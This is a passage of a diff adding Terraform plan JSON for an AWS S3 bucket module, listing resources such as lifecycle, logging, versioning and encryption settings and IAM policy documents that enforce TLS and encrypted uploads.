+                                "mode": "managed",
+                                "type": "aws_s3_bucket_lifecycle_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "local.lifecycle_rules"
+                                    ]
+                                },
+                                "depends_on": [
+                                    "aws_s3_bucket_versioning.this"
+                                ]
+                            },
+                            {
+                                "address": "aws_s3_bucket_logging.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_logging",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "target_bucket": {
+                                        "references": [
+                                            "var.logging[\"target_bucket\"]",
+                                            "var.logging"
+                                        ]
+                                    },
+                                    "target_prefix": {
+                                        "references": [
+                                            "var.logging[\"target_prefix\"]",
+                                            "var.logging"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.logging"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_metric.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_metric",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "name": {
+                                        "references": [
+                                            "each.value.name",
+                                            "each.value"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "for_each_expression": {
+                                    "references": [
+                                        "local.metric_configuration",
+                                        "local.create_bucket"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_object_lock_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_object_lock_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    },
+                                    "rule": [
+                                        {
+                                            "default_retention": [
+                                                {
+                                                    "days": {
+                                                        "references": [
+                                                            "var.object_lock_configuration.rule.default_retention.days",
+                                                            "var.object_lock_configuration.rule.default_retention",
+                                                            "var.object_lock_configuration.rule",
+                                                            "var.object_lock_configuration"
+                                                        ]
+                                                    },
+                                                    "mode": {
+                                                        "references": [
+                                                            "var.object_lock_configuration.rule.default_retention.mode",
+                                                            "var.object_lock_configuration.rule.default_retention",
+                                                            "var.object_lock_configuration.rule",
+                                                            "var.object_lock_configuration"
+                                                        ]
+                                                    },
+                                                    "years": {
+                                                        "references": [
+                                                            "var.object_lock_configuration.rule.default_retention.years",
+                                                            "var.object_lock_configuration.rule.default_retention",
+                                                            "var.object_lock_configuration.rule",
+                                                            "var.object_lock_configuration"
+                                                        ]
+                                                    }
+                                                }
+                                            ]
+                                        }
+                                    ],
+                                    "token": {
+                                        "references": [
+                                            "var.object_lock_configuration.token",
+                                            "var.object_lock_configuration"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.object_lock_enabled",
+                                        "var.object_lock_configuration.rule.default_retention",
+                                        "var.object_lock_configuration.rule",
+                                        "var.object_lock_configuration"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_ownership_controls.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_ownership_controls",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "local.attach_policy",
+                                            "aws_s3_bucket_policy.this[0].id",
+                                            "aws_s3_bucket_policy.this[0]",
+                                            "aws_s3_bucket_policy.this",
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "rule": [
+                                        {
+                                            "object_ownership": {
+                                                "references": [
+                                                    "var.object_ownership"
+                                                ]
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.control_object_ownership"
+                                    ]
+                                },
+                                "depends_on": [
+                                    "aws_s3_bucket_policy.this",
+                                    "aws_s3_bucket_public_access_block.this",
+                                    "aws_s3_bucket.this"
+                                ]
+                            },
+                            {
+                                "address": "aws_s3_bucket_policy.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_policy",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "policy": {
+                                        "references": [
+                                            "data.aws_iam_policy_document.combined[0].json",
+                                            "data.aws_iam_policy_document.combined[0]",
+                                            "data.aws_iam_policy_document.combined"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "local.attach_policy"
+                                    ]
+                                },
+                                "depends_on": [
+                                    "aws_s3_bucket_public_access_block.this"
+                                ]
+                            },
+                            {
+                                "address": "aws_s3_bucket_public_access_block.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_public_access_block",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "block_public_acls": {
+                                        "references": [
+                                            "var.block_public_acls"
+                                        ]
+                                    },
+                                    "block_public_policy": {
+                                        "references": [
+                                            "var.block_public_policy"
+                                        ]
+                                    },
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "ignore_public_acls": {
+                                        "references": [
+                                            "var.ignore_public_acls"
+                                        ]
+                                    },
+                                    "restrict_public_buckets": {
+                                        "references": [
+                                            "var.restrict_public_buckets"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_public_policy"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_replication_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_replication_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "role": {
+                                        "references": [
+                                            "var.replication_configuration[\"role\"]",
+                                            "var.replication_configuration"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.replication_configuration"
+                                    ]
+                                },
+                                "depends_on": [
+                                    "aws_s3_bucket_versioning.this"
+                                ]
+                            },
+                            {
+                                "address": "aws_s3_bucket_request_payment_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_request_payment_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    },
+                                    "payer": {
+                                        "references": [
+                                            "var.request_payer"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.request_payer"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_server_side_encryption_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_server_side_encryption_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.server_side_encryption_configuration"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_versioning.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_versioning",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    },
+                                    "mfa": {
+                                        "references": [
+                                            "var.versioning[\"mfa\"]",
+                                            "var.versioning"
+                                        ]
+                                    },
+                                    "versioning_configuration": [
+                                        {
+                                            "mfa_delete": {
+                                                "references": [
+                                                    "var.versioning[\"mfa_delete\"]",
+                                                    "var.versioning",
+                                                    "var.versioning[\"mfa_delete\"]",
+                                                    "var.versioning"
+                                                ]
+                                            },
+                                            "status": {
+                                                "references": [
+                                                    "var.versioning[\"enabled\"]",
+                                                    "var.versioning",
+                                                    "var.versioning[\"status\"]",
+                                                    "var.versioning",
+                                                    "var.versioning[\"status\"]",
+                                                    "var.versioning"
+                                                ]
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.versioning"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_website_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_website_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.website"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_caller_identity.current",
+                                "mode": "data",
+                                "type": "aws_caller_identity",
+                                "name": "current",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "schema_version": 0
+                            },
+                            {
+                                "address": "data.aws_canonical_user_id.this",
+                                "mode": "data",
+                                "type": "aws_canonical_user_id",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "local.create_bucket_acl",
+                                        "var.owner[\"id\"]",
+                                        "var.owner"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.access_log_delivery",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "access_log_delivery",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:PutObject"
+                                                ]
+                                            },
+                                            "effect": {
+                                                "constant_value": "Allow"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "logging.s3.amazonaws.com"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "Service"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "AWSAccessLogDeliveryWrite"
+                                            }
+                                        },
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:GetBucketAcl"
+                                                ]
+                                            },
+                                            "effect": {
+                                                "constant_value": "Allow"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "logging.s3.amazonaws.com"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "Service"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "AWSAccessLogDeliveryAclCheck"
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_access_log_delivery_policy"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.combined",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "combined",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "source_policy_documents": {
+                                        "references": [
+                                            "var.attach_elb_log_delivery_policy",
+                                            "data.aws_iam_policy_document.elb_log_delivery[0].json",
+                                            "data.aws_iam_policy_document.elb_log_delivery[0]",
+                                            "data.aws_iam_policy_document.elb_log_delivery",
+                                            "var.attach_lb_log_delivery_policy",
+                                            "data.aws_iam_policy_document.lb_log_delivery[0].json",
+                                            "data.aws_iam_policy_document.lb_log_delivery[0]",
+                                            "data.aws_iam_policy_document.lb_log_delivery",
+                                            "var.attach_access_log_delivery_policy",
+                                            "data.aws_iam_policy_document.access_log_delivery[0].json",
+                                            "data.aws_iam_policy_document.access_log_delivery[0]",
+                                            "data.aws_iam_policy_document.access_log_delivery",
+                                            "var.attach_require_latest_tls_policy",
+                                            "data.aws_iam_policy_document.require_latest_tls[0].json",
+                                            "data.aws_iam_policy_document.require_latest_tls[0]",
+                                            "data.aws_iam_policy_document.require_latest_tls",
+                                            "var.attach_deny_insecure_transport_policy",
+                                            "data.aws_iam_policy_document.deny_insecure_transport[0].json",
+                                            "data.aws_iam_policy_document.deny_insecure_transport[0]",
+                                            "data.aws_iam_policy_document.deny_insecure_transport",
+                                            "var.attach_deny_unencrypted_object_uploads",
+                                            "data.aws_iam_policy_document.deny_unencrypted_object_uploads[0].json",
+                                            "data.aws_iam_policy_document.deny_unencrypted_object_uploads[0]",
+                                            "data.aws_iam_policy_document.deny_unencrypted_object_uploads",
+                                            "var.attach_deny_incorrect_kms_key_sse",
+                                            "data.aws_iam_policy_document.deny_incorrect_kms_key_sse[0].json",
+                                            "data.aws_iam_policy_document.deny_incorrect_kms_key_sse[0]",
+                                            "data.aws_iam_policy_document.deny_incorrect_kms_key_sse",
+                                            "var.attach_deny_incorrect_encryption_headers",
+                                            "data.aws_iam_policy_document.deny_incorrect_encryption_headers[0].json",
+                                            "data.aws_iam_policy_document.deny_incorrect_encryption_headers[0]",
+                                            "data.aws_iam_policy_document.deny_incorrect_encryption_headers",
+                                            "var.attach_inventory_destination_policy",
+                                            "var.attach_analytics_destination_policy",
+                                            "data.aws_iam_policy_document.inventory_and_analytics_destination_policy[0].json",
+                                            "data.aws_iam_policy_document.inventory_and_analytics_destination_policy[0]",
+                                            "data.aws_iam_policy_document.inventory_and_analytics_destination_policy",
+                                            "var.attach_policy",
+                                            "var.policy"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "local.attach_policy"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.deny_incorrect_encryption_headers",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "deny_incorrect_encryption_headers",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:PutObject"
+                                                ]
+                                            },
+                                            "condition": [
+                                                {
+                                                    "test": {
+                                                        "constant_value": "StringNotEquals"
+                                                    },
+                                                    "values": {
+                                                        "references": [
+                                                            "var.server_side_encryption_configuration.rule.apply_server_side_encryption_by_default.sse_algorithm",
+                                                            "var.server_side_encryption_configuration.rule.apply_server_side_encryption_by_default",
+                                                            "var.server_side_encryption_configuration.rule",
+                                                            "var.server_side_encryption_configuration"
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "s3:x-amz-server-side-encryption"
+                                                    }
+                                                }
+                                            ],
+                                            "effect": {
+                                                "constant_value": "Deny"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "*"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "*"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "denyIncorrectEncryptionHeaders"
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_deny_incorrect_encryption_headers"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.deny_incorrect_kms_key_sse",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "deny_incorrect_kms_key_sse",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:PutObject"
+                                                ]
+                                            },
+                                            "condition": [
+                                                {
+                                                    "test": {
+                                                        "constant_value": "StringNotEquals"
+                                                    },
+                                                    "values": {
+                                                        "references": [
+                                                            "var.allowed_kms_key_arn"
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "s3:x-amz-server-side-encryption-aws-kms-key-id"
+                                                    }
+                                                }
+                                            ],
+                                            "effect": {
+                                                "constant_value": "Deny"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "*"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "*"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "denyIncorrectKmsKeySse"
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_deny_incorrect_kms_key_sse"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.deny_insecure_transport",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "deny_insecure_transport",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:*"
+                                                ]
+                                            },
+                                            "condition": [
+                                                {
+                                                    "test": {
+                                                        "constant_value": "Bool"
+                                                    },
+                                                    "values": {
+                                                        "constant_value": [
+                                                            "false"
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "aws:SecureTransport"
+                                                    }
+                                                }
+                                            ],
+                                            "effect": {
+                                                "constant_value": "Deny"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "*"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "*"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this",
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "denyInsecureTransport"
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_deny_insecure_transport_policy"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.deny_unencrypted_object_uploads",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "deny_unencrypted_object_uploads",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:PutObject"
+                                                ]
+                                            },
+                                            "condition": [
+                                                {
+                                                    "test": {
+                                                        "constant_value": "Null"
+                                                    },
+                                                    "values": {
+                                                        "constant_value": [
+                                                            true
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "s3:x-amz-server-side-encryption"
+                                                    }
+                                                }
+                                            ],
+                                            "effect": {
+                                                "constant_value": "Deny"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "*"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "*"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "denyUnencryptedObjectUploads"
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_deny_unencrypted_object_uploads"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.elb_log_delivery",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "elb_log_delivery",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:PutObject"
+                                                ]
+                                            },
+                                            "effect": {
+                                                "constant_value": "Allow"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "logdelivery.elasticloadbalancing.amazonaws.com"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "Service"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": ""
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_elb_log_delivery_policy"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.inventory_and_analytics_destination_policy",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "inventory_and_analytics_destination_policy",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:PutObject"
+                                                ]
+                                            },
+                                            "condition": [
+                                                {
+                                                    "test": {
+                                                        "constant_value": "ArnLike"
+                                                    },
+                                                    "values": {
+                                                        "references": [
+                                                            "var.inventory_self_source_destination",
+                                                            "aws_s3_bucket.this[0].arn",
+                                                            "aws_s3_bucket.this[0]",
+                                                            "aws_s3_bucket.this",
+                                                            "var.inventory_source_bucket_arn",
+                                                            "var.analytics_self_source_destination",
+                                                            "aws_s3_bucket.this[0].arn",
+                                                            "aws_s3_bucket.this[0]",
+                                                            "aws_s3_bucket.this",
+                                                            "var.analytics_source_bucket_arn"
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "aws:SourceArn"
+                                                    }
+                                                },
+                                                {
+                                                    "test": {
+                                                        "constant_value": "StringEquals"
+                                                    },
+                                                    "values": {
+                                                        "references": [
+                                                            "var.inventory_self_source_destination",
+                                                            "data.aws_caller_identity.current.id",
+                                                            "data.aws_caller_identity.current",
+                                                            "var.inventory_source_account_id",
+                                                            "var.analytics_self_source_destination",
+                                                            "data.aws_caller_identity.current.id",
+                                                            "data.aws_caller_identity.current",
+                                                            "var.analytics_source_account_id"
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "aws:SourceAccount"
+                                                    }
+                                                },
+                                                {
+                                                    "test": {
+                                                        "constant_value": "StringEquals"
+                                                    },
+                                                    "values": {
+                                                        "constant_value": [
+                                                            "bucket-owner-full-control"
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "s3:x-amz-acl"
+                                                    }
+                                                }
+                                            ],
+                                            "effect": {
+                                                "constant_value": "Allow"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "s3.amazonaws.com"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "Service"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "destinationInventoryAndAnalyticsPolicy"
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_inventory_destination_policy",
+                                        "var.attach_analytics_destination_policy"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.lb_log_delivery",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "lb_log_delivery",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:PutObject"
+                                                ]
+                                            },
+                                            "condition": [
+                                                {
+                                                    "test": {
+                                                        "constant_value": "StringEquals"
+                                                    },
+                                                    "values": {
+                                                        "constant_value": [
+                                                            "bucket-owner-full-control"
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "s3:x-amz-acl"
+                                                    }
+                                                }
+                                            ],
+                                            "effect": {
+                                                "constant_value": "Allow"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "delivery.logs.amazonaws.com"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "Service"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "AWSLogDeliveryWrite"
+                                            }
+                                        },
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:GetBucketAcl",
+                                                    "s3:ListBucket"
+                                                ]
+                                            },
+                                            "effect": {
+                                                "constant_value": "Allow"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "delivery.logs.amazonaws.com"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "Service"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "AWSLogDeliveryAclCheck"
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_lb_log_delivery_policy"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.require_latest_tls",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "require_latest_tls",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:*"
+                                                ]
+                                            },
+                                            "condition": [
+                                                {
+                                                    "test": {
+                                                        "constant_value": "NumericLessThan"
+                                                    },
+                                                    "values": {
+                                                        "constant_value": [
+                                                            "1.2"
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "s3:TlsVersion"
+                                                    }
+                                                }
+                                            ],
+                                            "effect": {
+                                                "constant_value": "Deny"
+                                            },
+                                            "principals": [
+                                                {
